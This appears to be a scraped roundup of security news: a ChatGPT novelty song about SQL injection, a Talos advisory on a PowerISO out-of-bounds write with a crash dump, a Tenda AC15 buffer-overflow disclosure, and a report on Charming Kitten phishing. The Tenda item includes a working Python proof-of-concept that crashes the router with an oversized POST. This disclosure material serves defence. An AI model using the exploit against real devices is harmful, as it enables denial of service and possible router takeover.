ChatGPT – the artificial intelligence chat tool from OpenAI – is the hottest thing in infosec-focused social media circles just now. Rather than suggesting possible vulnerabilities in code we wondered what ChatGPT could conjure when asked to write lyrics for a song about SQL injection in the style of the late David Bowie.

The results were more than satisfactory:

In the realm of computers, where data flows like a stream  
There are those that seek to exploit and cause us all to scream  
They are the hackers, the codebreakers, the malicious ones  
And among their favorite trick is the art of SQL injection

Chorus:

SQL injection, SQL injection  
A dangerous game, a digital infection  
SQL injection, SQL injection  
Beware of the hackers and their devious invention

To paraphrase the great man himself, I still don’t know what I was waiting for... but it definitely wasn’t this.

RECOMMENDED Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Deserialized web security roundup – Fortinet, Citrix bugs; another Uber breach; hacking NFTs at Black Hat 

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**SUMMARY**

A memory corruption vulnerability exists in the VHD File Format parsing CXSPARSE record functionality of PowerISO PowerISO 8.3. A specially-crafted file can lead to an out-of-bounds write. A victim needs to open a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

PowerISO PowerISO 8.3

**PRODUCT URLS**

PowerISO - https://www.poweriso.com/

**CVSSv3 SCORE**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-787 - Out-of-bounds Write

**DETAILS**

PowerISO is a disk image file processing tool supporting operations on various file formats, and also allows to mount images as a virtual drive.

Virtual Hard Disk (VHD) Image format is a commonly image format used in Microsoft virtualization products. It is both used to store hard disk images and snapshots.  
For more details about this format see link.

Vulnerable code below:

        0000000000442869 | 41:8B0C38                | mov ecx,dword ptr ds:[r8+rdi]
        000000000044286D | 41:FFC1                  | inc r9d
        0000000000442870 | 8BC1                     | mov eax,ecx
        0000000000442872 | 8BD1                     | mov edx,ecx
        0000000000442874 | C1E9 08                  | shr ecx,8
        0000000000442877 | C1E2 10                  | shl edx,10
        000000000044287A | 41:23C5                  | and eax,r13d
        000000000044287D | 41:23CD                  | and ecx,r13d
        0000000000442880 | 0BD0                     | or edx,eax
        0000000000442882 | 41:0FB64438 03           | movzx eax,byte ptr ds:[r8+rdi+3]
        0000000000442888 | C1E2 08                  | shl edx,8
        000000000044288B | 0BD0                     | or edx,eax
        000000000044288D | 48:8B43 10               | mov rax,qword ptr ds:[rbx+10]
        0000000000442891 | 0BD1                     | or edx,ecx
        0000000000442893 | 41:891400                | mov dword ptr ds:[r8+rax],edx
        0000000000442897 | 49:83C0 04               | add r8,4
        000000000044289B | 44:3B4B 18               | cmp r9d,dword ptr ds:[rbx+18]       ; * Num of blocks from cxsparse record
        000000000044289F | 72 C8                    | jb poweriso.442869
    

Vulnerability exists because the “Num of blocks” value from the CXSPARSE record is not validated properly.  
An attacker can control the loop counter leading to arbitrary memory write.

**Crash Information**

    	PowerISO+0x42893:
    	00000000`00442893 41891400        mov     dword ptr [r8+rax],edx ds:00000000`02b2f000=????????
    
    
    	0:000> !analyze -v
    	*******************************************************************************
    	*                                                                             *
    	*                        Exception Analysis                                   *
    	*                                                                             *
    	*******************************************************************************
    
    
    	KEY_VALUES_STRING: 1
    
    		Key  : AV.Fault
    		Value: Write
    
    		Key  : Analysis.CPU.mSec
    		Value: 1281
    
    		Key  : Analysis.DebugAnalysisManager
    		Value: Create
    
    		Key  : Analysis.Elapsed.mSec
    		Value: 17362
    
    		Key  : Analysis.IO.Other.Mb
    		Value: 9
    
    		Key  : Analysis.IO.Read.Mb
    		Value: 1
    
    		Key  : Analysis.IO.Write.Mb
    		Value: 12
    
    		Key  : Analysis.Init.CPU.mSec
    		Value: 406
    
    		Key  : Analysis.Init.Elapsed.mSec
    		Value: 9616
    
    		Key  : Analysis.Memory.CommitPeak.Mb
    		Value: 106
    
    		Key  : Timeline.OS.Boot.DeltaSec
    		Value: 471002
    
    		Key  : Timeline.Process.Start.DeltaSec
    		Value: 12
    
    		Key  : WER.OS.Branch
    		Value: vb_release
    
    		Key  : WER.OS.Timestamp
    		Value: 2019-12-06T14:06:00Z
    
    		Key  : WER.OS.Version
    		Value: 10.0.19041.1
    
    		Key  : WER.Process.Version
    		Value: 8.3.0.0
    
    
    	NTGLOBALFLAG:  0
    
    	PROCESS_BAM_CURRENT_THROTTLED: 0
    
    	PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    	APPLICATION_VERIFIER_FLAGS:  0
    
    	EXCEPTION_RECORD:  (.exr -1)
    	ExceptionAddress: 0000000000442893 (PowerISO+0x0000000000042893)
    	   ExceptionCode: c0000005 (Access violation)
    	  ExceptionFlags: 00000000
    	NumberParameters: 2
    	   Parameter[0]: 0000000000000001
    	   Parameter[1]: 0000000002c5f000
    	Attempt to write to address 0000000002c5f000
    
    	FAULTING_THREAD:  00000ba0
    
    	PROCESS_NAME:  PowerISO.exe
    
    	WRITE_ADDRESS:  0000000002c5f000 
    
    	ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    	EXCEPTION_CODE_STR:  c0000005
    
    	EXCEPTION_PARAMETER1:  0000000000000001
    
    	EXCEPTION_PARAMETER2:  0000000002c5f000
    
    	STACK_TEXT:  
    	00000000`0014de30 00000000`00442aad     : 00000000`00000200 00000000`00000000 00000000`000007b3 00000000`3000cbfb : PowerISO+0x42893
    	00000000`0014e2b0 00000000`00442d2c     : 00000000`05a603c0 00000000`00000000 78697463`656e6f63 00000000`00000001 : PowerISO+0x42aad
    	00000000`0014e520 00000000`004061ae     : 00000000`00000001 00000000`00000688 00000000`03380f70 00000000`03380f70 : PowerISO+0x42d2c
    	00000000`0014e560 00000000`005d6cf6     : 00000000`0014e7a8 00000000`0014e7a8 00000000`00000001 00000000`02ba853c : PowerISO+0x61ae
    	00000000`0014e710 00000000`004f2733     : 00000000`0014e8b0 00000000`00000000 00000000`00000000 00007ff9`4a6dc9bb : PowerISO+0x1d6cf6
    	00000000`0014e830 00000000`004f2fc5     : 00000000`1c12beb3 00000000`0014ebc8 00000000`66076fb2 00000000`d88dfeb5 : PowerISO+0xf2733
    	00000000`0014eb90 00000000`005561ef     : 00000000`00000004 00000000`0333ba1c 00000000`00000000 00000000`03348f60 : PowerISO+0xf2fc5
    	00000000`0014ebc0 00000000`004ee5ad     : 00000000`0014ed00 00007ff9`35ff414e 00000000`00000004 00008731`00000002 : PowerISO+0x1561ef
    	00000000`0014ebf0 00000000`006280ed     : 00000000`00000001 00007ff9`4a6deb96 00000000`00000363 00000000`00000001 : PowerISO+0xee5ad
    	00000000`0014f890 00000000`00624c83     : 00000000`02b50150 ffffffff`ffffffff 00000000`00000006 00000000`00000080 : PowerISO+0x2280ed
    	00000000`0014f9c0 00000000`004ebf6f     : 00000000`00000000 00000000`00d3103e 00000000`03348f60 00000000`00000001 : PowerISO+0x224c83
    	00000000`0014fa20 00000000`00626410     : ffffffff`fffffffe 00000000`00000113 00000000`00000000 00000000`00000113 : PowerISO+0xebf6f
    	00000000`0014fa50 00000000`006265be     : 00000000`008df500 00000000`00becb30 00000000`0333c920 00007ff9`02000002 : PowerISO+0x226410
    	00000000`0014fb10 00007ff9`4a6de858     : 00000000`008df4a0 00000000`00000113 00000000`00000001 00000000`00000000 : PowerISO+0x2265be
    	00000000`0014fb70 00007ff9`4a6de299     : 00000000`00d3103e 00000000`00626570 00000000`00d3103e 00000000`00000113 : USER32!UserCallWinProcCheckWow+0x2f8
    	00000000`0014fd00 00000000`00621c6d     : 00000000`00626570 00000000`008df4a0 00000000`00000002 00000000`008df4a0 : USER32!DispatchMessageWorker+0x249
    	00000000`0014fd80 00000000`00621aa9     : 00000000`008df4a0 00000000`00400000 00000000`00000001 00000000`00000000 : PowerISO+0x221c6d
    	00000000`0014fdc0 00000000`0062aa57     : 00000000`006486d8 00000000`00000000 00000000`00648718 00000000`00648720 : PowerISO+0x221aa9
    	00000000`0014fe20 00000000`005f607b     : 00000000`00000045 00000000`00000000 00000000`00000000 00000000`00400000 : PowerISO+0x22aa57
    	00000000`0014fe80 00007ff9`4a627034     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : PowerISO+0x1f607b
    	00000000`0014ff30 00007ff9`4a9426a1     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
    	00000000`0014ff60 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
    
    
    	STACK_COMMAND:  ~0s ; .cxr ; kb
    
    	SYMBOL_NAME:  PowerISO+42893
    
    	MODULE_NAME: PowerISO
    
    	IMAGE_NAME:  PowerISO.exe
    
    	FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_PowerISO.exe!Unknown
    
    	OS_VERSION:  10.0.19041.1
    
    	BUILDLAB_STR:  vb_release
    
    	OSPLATFORM_TYPE:  x64
    
    	OSNAME:  Windows 10
    
    	IMAGE_VERSION:  8.3.0.0
    
    	FAILURE_ID_HASH:  {1b12d601-7fad-79d8-d5a8-9f7caedc20c8}
    
    	Followup:     MachineOwner
    	---------
    

**TIMELINE**

2022-10-27 - Vendor Disclosure  
2022-11-28 - Vendor Patch Release  
2022-12-07 - Public Release

Discovered by Piotr Bania of Cisco Talos.

CVE-2022-41992: TALOS-2022-1644 || Cisco Talos Intelligence Group

Tenda AC15 V15.03.06.23 is vulnerable to Buffer Overflow via function formSetClientState.

/goform/SetClientState， The two variables ul\_speed and dl\_speed are user-controllable and will be spliced into the buff by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'limitEn=1&deviceId=a&limitSpeedUp=a&limitSpeed=' + p1

p3 \= b"POST /goform/SetClientState" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-46109: IOT_Vul/Tenda/AC10/formSetClientState at main · z1r00/IOT_Vul

The not-so-charming APT's intelligence-gathering initiatives are likely being used by the Iranian state to target kidnapping victims.

State-sponsored advanced persistent threat (APT) Charming Kitten (aka TA453), which is purportedly linked to the Islamic Revolutionary Guard Corps (IRGC), has updated its phishing techniques, and is using malware and more confrontational lures, possibly in service to kidnapping operations.

Since 2020, Proofpoint researchers have observed variations in phishing activity by the APT (which also overlaps with the groups Phosphorous and APT42), with the group employing new methods and targeting different targets than in the past. In the latest campaigns, researchers have observed more aggressive activity, which could be used to support attempted "kinetic operations" from the IRGC, including murder for hire and kidnapping, researchers said.

"TA453, like its fellow advanced persistent threat actors engaged in espionage, is in a constant state of flux regarding its tools, tactics, techniques, and targeting," a Proofpoint report out this week concluded. "Adjusting its approaches, likely in response to ever-changing and expanding priorities, the outlier campaigns are likely to continue and reflect IRGC intelligence-collection requirements, including possible support for hostile, and even kinetic, operations."

**Hacking E-Mail Accounts**

In 2021, Proofpoint documented TA453 spoofing two scholars at the University of London to try and gain access to email inboxes belonging to journalists, think tank personnel, academics, and others. In August, Google researchers said the hacking team had started employing a data-theft tool targeting Gmail, Yahoo, and Microsoft Outlook accounts using previously acquired credentials. Intelligence gathered from email conversations could be used for location tracking and more. 

One campaign that researchers observed against a former member of the Israeli military was threatening and disturbing in that regard, Proofpoint's report noted.

"TA453 utilized multiple compromised email accounts, including those of a high-ranking military official, to deliver a link to the target," researchers explained. "The use of multiple compromised email accounts to target a single target is unusual for TA453. While each of the URLs observed were unique to each compromised email account, each linked to the domain gettogether\[.\]quest and pointed to the same threatening message in Hebrew."

The message read: "I'm sure you remember what I told you. Every email you get from your friends may be me and not someone who it claims. We follow you like your shadow, in Tel Aviv, in \[redacted\], in Dubai, in Bahrain. Take care of yourself."

**Updated Cyber-Targets for Charming Kitten**

Previous Charming Kitten email campaigns had almost always targeted academics, researchers, diplomats, dissidents, journalists, and human rights activists, using web beacons in message texts before eventually attempting to tap the target's credentials. Such campaigns can start with weeks of innocuous conversations on accounts created by the actors before launching the actual attack.

The new campaigns have targeted specific researchers in the medical field, an aerospace engineer, a real estate agent, and travel agents, among others, wrote Proofpoint researchers Joshua Miller and Crista Giering in a post this week.

In some cases, TA453 relies on a fictitious person, "Samantha Wolf," as bait. Proofpoint researchers first identified the persona in mid-March when the associated Gmail account was included in the bait content of a malicious document.

"Samantha's confrontational lures demonstrate an interesting attempt to generate engagement with targets not seen from other TA453 accounts," the report noted.

The Proofpoint report said it could state "with moderate confidence" that the more aggressive activity could represent collaboration with another branch of the Iranian state, including the IRGC Quds Force, which carries out physical operations.

In May, Israeli intelligence agency Shin Bet identified Iranian intelligence services' phishing activity designed to lure targets to kidnap them, Proofpoint noted.

"Based on the indicators provided, Proofpoint correlated this activity with TA453 campaigns from December 2021 in which campaigns attributed to TA453 used a spoofed email address of a reputable academic ... to give a researcher an 'Invitation to Zurich Strategic Dialogue Jan-2022,' " according to the report.

Tag

#intel